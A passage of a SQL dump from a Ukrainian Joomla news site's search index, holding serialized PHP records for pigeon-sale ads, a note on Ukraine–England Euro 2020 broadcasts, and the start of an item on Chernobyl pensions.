19:31:36\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:10:\"Кінги\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:42:\"2522:shokoladna-parochka-pominyae-propisku\";s:7:\"catslug\";s:9:\"127:kinhy\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:56:\"/holuby/kinhy/2522-shokoladna-parochka-pominyae-propisku\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:10:\"Кінги\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Кінги\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2522\";s:5:\"route\";s:97:\"index.php?option=com_content&view=article&id=2522:shokoladna-parochka-pominyae-propisku&catid=127\";s:5:\"title\";s:65:\"Шоколадна парочка поміняє прописку\";s:11:\"description\";s:396:\" Голуб 19 року та самочка 20 року, спаровані, Локація - м.Малин, Житомирської області. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч, Хмільник. Ціна 300 за одного, телефонуйте 0508320922, домовимось. \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-06-17 19:31:36\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-06-17 19:31:36\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4857,'index.php?option=com_content&view=article&id=2523','index.php?option=com_content&view=article&id=2523:poshtovi-molodi&catid=126','Поштові молоді ',' Голуби поштові молоді необлітані, локація - м.Малин Житомрської області. Можу маршруткою передати в Київ, Житомир, Радомишль, Коростишів, Бердичів, Вінницю, Овруч. Дзвоніть 0508320922 - домовимось. ','2021-06-23 11:20:35','1f55296d01eea6c1d8aac8427c1ab2c8',1,1,1,'*','2021-06-23 08:18:23','0000-00-00 00:00:00','2021-06-23 08:18:23','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2523\";s:5:\"alias\";s:15:\"poshtovi-molodi\";s:7:\"summary\";s:581:\"	<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/230621.jpg\"><img alt=\"\" class=\"fr-fil fr-dii\" src=\"https://malehus.in.ua/images/stories/230621.jpg\"></a></p><p><br><!--EndFragment--></p><p><br></p><p>Голуби поштові молоді необлітані, локація - м.Малин  Житомрської області.</p><p>Можу маршруткою  передати в Київ, Житомир, Радомишль, Коростишів, Бердичів, Вінницю, Овруч.</p><p>Дзвоніть 0508320922 - домовимось.</p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"126\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-06-23 08:20:35\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"5\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"Поштові\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:20:\"2523:poshtovi-molodi\";s:7:\"catslug\";s:12:\"126:poshtovi\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:37:\"/holuby/poshtovi/2523-poshtovi-molodi\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"Поштові\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"Поштові\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2523\";s:5:\"route\";s:75:\"index.php?option=com_content&view=article&id=2523:poshtovi-molodi&catid=126\";s:5:\"title\";s:28:\"Поштові молоді \";s:11:\"description\";s:350:\" Голуби поштові молоді необлітані, локація - м.Малин Житомрської області. Можу маршруткою передати в Київ, Житомир, Радомишль, Коростишів, Бердичів, Вінницю, Овруч. Дзвоніть 0508320922 - домовимось. \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-06-23 08:18:23\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-06-23 08:18:23\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4909,'index.php?option=com_content&view=article&id=2524','index.php?option=com_content&view=article&id=2524:ukrajina-angliya-de-divitisya-match-chempionatu-evropi-2020&catid=8','Україна – Англія: де дивитися матч чемпіонату Європи-2020',' Поєдинок Україна – Англія відбудеться у Римі на Стадіо Олімпіко 3 липня. Початок матчу о 22:00. Матч у прямому ефірі на території України покажуть кілька трансляторів. Дивитись матч Україна – Англія онлайн можна на платфо рмі Oll.tv за наявності відповідної підписки. Крім того, гру можна переглянути в прямому ефірі на телеканалі \"Футбол 1\", починаючи з 21:50. ТРК \"Україна\" також покаже матч команди Шевченка в 1/4 чемпіонату Європи. Початок трансляції – о 21:50. Поєдинок на ТРК \"Україна\" можна переглянути онлайн на MEGOGO (за наявності оплаченої підписки). Для довідки: збірні України та Англії зустрічалися раніше 7 разів. Перевага на боці \"Трьох левів\": 4 перемоги, 2 нічиї, 1 поразка. Єдина перемога \"синьо-жовтих\" (1:0) трапилася у кваліфікації до ЧС-2010. Переможний м\'яч у Дніпрі тоді забив Сергій Назаренко. ','2021-07-02 15:12:09','8862aeaeb54676d59c707b62c903cc7a',1,1,1,'*','2021-07-02 11:23:21','0000-00-00 00:00:00','2021-07-02 11:23:21','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2524\";s:5:\"alias\";s:59:\"ukrajina-angliya-de-divitisya-match-chempionatu-evropi-2020\";s:7:\"summary\";s:1880:\"<p><strong>Поєдинок Україна – Англія відбудеться у Римі на Стадіо Олімпіко 3 липня.  Початок матчу о 22:00.</strong></p><p><span style=\"font-family: Verdana, Geneva; font-size: 15px;\">Матч у прямому ефірі на території України покажуть кілька трансляторів.  Дивитись матч Україна – Англія онлайн можна на платфо<a class=\"modal\" href=\"https://malehus.in.ua/images/stories/2x11_gif.gif\"><img alt=\"\" class=\"fr-image-dropped fr-fil fr-dii\" src=\"https://malehus.in.ua/images/stories/2x11_gif.gif\"></a>рмі Oll.tv за наявності відповідної підписки. Крім того, гру можна переглянути в  прямому ефірі на телеканалі \"Футбол 1\", починаючи з 21:50.</span></p><p><span style=\"font-family: Verdana, Geneva; font-size: 15px;\">ТРК \"Україна\" також покаже матч команди Шевченка в 1/4 чемпіонату  Європи. Початок трансляції – о 21:50. Поєдинок на ТРК \"Україна\" можна  переглянути онлайн на MEGOGO  (за наявності оплаченої підписки).</span></p><p><span style=\"font-family: Verdana, Geneva; font-size: 15px;\">Для довідки: збірні України та Англії зустрічалися раніше 7 разів. Перевага  на боці \"Трьох левів\": 4 перемоги, 2 нічиї, 1 поразка. Єдина перемога  \"синьо-жовтих\" (1:0) трапилася у кваліфікації до ЧС-2010. Переможний  м\'яч у Дніпрі тоді забив Сергій Назаренко.</span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-07-02 12:12:09\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:2:\"52\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:64:\"2524:ukrajina-angliya-de-divitisya-match-chempionatu-evropi-2020\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:76:\"/8-novini-2/2524-ukrajina-angliya-de-divitisya-match-chempionatu-evropi-2020\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2524\";s:5:\"route\";s:117:\"index.php?option=com_content&view=article&id=2524:ukrajina-angliya-de-divitisya-match-chempionatu-evropi-2020&catid=8\";s:5:\"title\";s:102:\"Україна – Англія: де дивитися матч чемпіонату Європи-2020\";s:11:\"description\";s:1443:\" Поєдинок Україна – Англія відбудеться у Римі на Стадіо Олімпіко 3 липня. Початок матчу о 22:00. Матч у прямому ефірі на території України покажуть кілька трансляторів. Дивитись матч Україна – Англія онлайн можна на платфо рмі Oll.tv за наявності відповідної підписки. Крім того, гру можна переглянути в прямому ефірі на телеканалі \"Футбол 1\", починаючи з 21:50. ТРК \"Україна\" також покаже матч команди Шевченка в 1/4 чемпіонату Європи. Початок трансляції – о 21:50. Поєдинок на ТРК \"Україна\" можна переглянути онлайн на MEGOGO (за наявності оплаченої підписки). Для довідки: збірні України та Англії зустрічалися раніше 7 разів. Перевага на боці \"Трьох левів\": 4 перемоги, 2 нічиї, 1 поразка. Єдина перемога \"синьо-жовтих\" (1:0) трапилася у кваліфікації до ЧС-2010. Переможний м\'яч у Дніпрі тоді забив Сергій Назаренко. \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-07-02 11:23:21\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-07-02 11:23:21\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4917,'index.php?option=com_content&view=article&id=2525','index.php?option=com_content&view=article&id=2525:do-vidoma-pensioneriv-chornobiltsiv&catid=8','До відома пенсіонерів чорнобильців',' В Україні частково набрав чинності закон, що передбачає підвищення пенсій для чорнобильців. Повністю він набере чинності з 1 січня 2022 року. Документ вчора опублікували у виданні \"Голос України\". Ряд його положень набрали чинності з 1 липня: -положення про мінімальні розміри пенсії по інвалідності, що настала внаслідок каліцтва чи захворювання; -пенсії у зв\'язку з втратою годувальника внаслідок Чорнобильської катастрофи; -введення державної адресної допомоги до пенсії. Із закону випливає, що додаткова пенсія за шкоду, заподіяну здоров\'ю, та щомісячна компенсація сім\'ям за втрату годувальника внаслідок Чорнобильської катастрофи, виплачується повністю і не залежить від зарплати, інших пенсій чи інших доходів.','2021-07-02 15:29:58','e57d481759fcde22d0619e6363a5695b',1,1,1,'*','2021-07-02 12:21:09','0000-00-00 00:00:00','2021-07-02 12:21:09','0000-00-00 00:00:00',0,0,4,_binary 